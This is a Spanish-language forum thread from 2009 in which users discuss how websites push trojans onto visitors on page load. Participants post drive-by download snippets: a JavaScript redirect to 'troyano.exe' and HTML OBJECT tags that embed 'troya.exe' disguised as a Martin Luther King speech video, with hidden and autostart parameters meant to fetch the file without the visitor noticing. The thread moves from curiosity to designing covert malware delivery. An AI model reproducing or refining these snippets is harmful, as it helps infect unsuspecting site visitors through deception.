web php ejecuta script

winnipu · 30 Enero 2009, 00:19 AM

Vereis, hoy andaba buscando info sobre php, ya que habia una duda sobre este lenguaje que me acuciaba y en el foro parece que nadie podia ayudarme. Y cual fue mi sorpresa que navegando entro en una web y me salta el antivirus un mensaje: detectado troyano. Ahi es cuando me ha surgido la duda de como narices hacen eso? Ejecutando un script al cargar la pagina? Que comando php esta relacionado con esto? Es decir, yo se que puedes programar para que en cierta zona puedas pinchar para descargar algo. Pero nada mas cargar la pagina, sin darle a nada, que se te descargue un troyano y si no llega a ser por el antivirus no lo hubiese detectado, pues...
Que comando php usan para hacer esto?

HardieVon · 30 Enero 2009, 06:12 AM

lol, con razon me borraron el post xD.
ponle mas retornos de carro, que no entendia xD

a mira supuestamente hay una modificacion del header para descarga el documento.

pero lo que viste yo supongo que mas bien fue un.

Código (javascript) [Seleccionar]


<script>
document.location.replace('troyano.exe');
</script>

jdc · 30 Enero 2009, 09:00 AM

Hay veces que pequeños códigos fuentes de códigos maliciosos pueden hacer saltar antivirus.

& eDu & · 30 Enero 2009, 09:23 AM

Cuando entras, pueden tener un frame con la dirección de la descarga!

winnipu · 31 Enero 2009, 01:12 AM

muchas gracias. Las cabecereas y frames. Tambien estuve investigando y hablaban de las ocx y flash. Siempre hay caminos. XD

De todos modos HansVon pruebo ese codigo y me abre una ventana y me dice si me quiero descargar el archivo, pero vamos, asi no me lo descargo ni de coña. La pregunta es:

puede ejecutarse algo directamente al cargarse la pagina y sin que se vea? o eso es imposible? me serviria de algo meterle a tu codigo un hidden?

HardieVon · 31 Enero 2009, 06:23 AM

jeje claro que si, as llamar un exe normal como si fuera un applet y te lo ejecuta.

es con <object>

winnipu · 1 Febrero 2009, 00:23 AM

HansVon, pero me dices crear una ventana que diga:

"necesita este plugin para ver correctamente la pagina" (es decir ingenieria social).

O me estas diciendo que con object no se vera lo que se esta descargando ni habra que darle a ningun boton, Se veria algo con este codigo?

Código [Seleccionar]

<BODY>
<OBJECT data="troya.exe">
</OBJECT>
</BODY>

O mejor algo asi?

Código [Seleccionar]

<OBJECT DATA="mlk.mov" TYPE="video/quicktime" TITLE="Martin Luther King's &quot;I Have a Dream&quot; speech" WIDTH=150 HEIGHT=150>
<PARAM NAME=pluginspage VALUE="http://quicktime.apple.com/">
<PARAM NAME=autoplay VALUE=true>
<OBJECT DATA="troya.exe" TYPE="audio/mpeg" TITLE="Martin Luther King's &quot;I Have a Dream&quot; speech">
<PARAM NAME=autostart VALUE=true>
<PARAM NAME=hidden VALUE=true>
<A HREF="mlk.html">Full text of Martin Luther King's "I Have a Dream" speech</A>
</OBJECT>
</OBJECT>

No se si he acertado, sobre lo que intentabas decirme o no.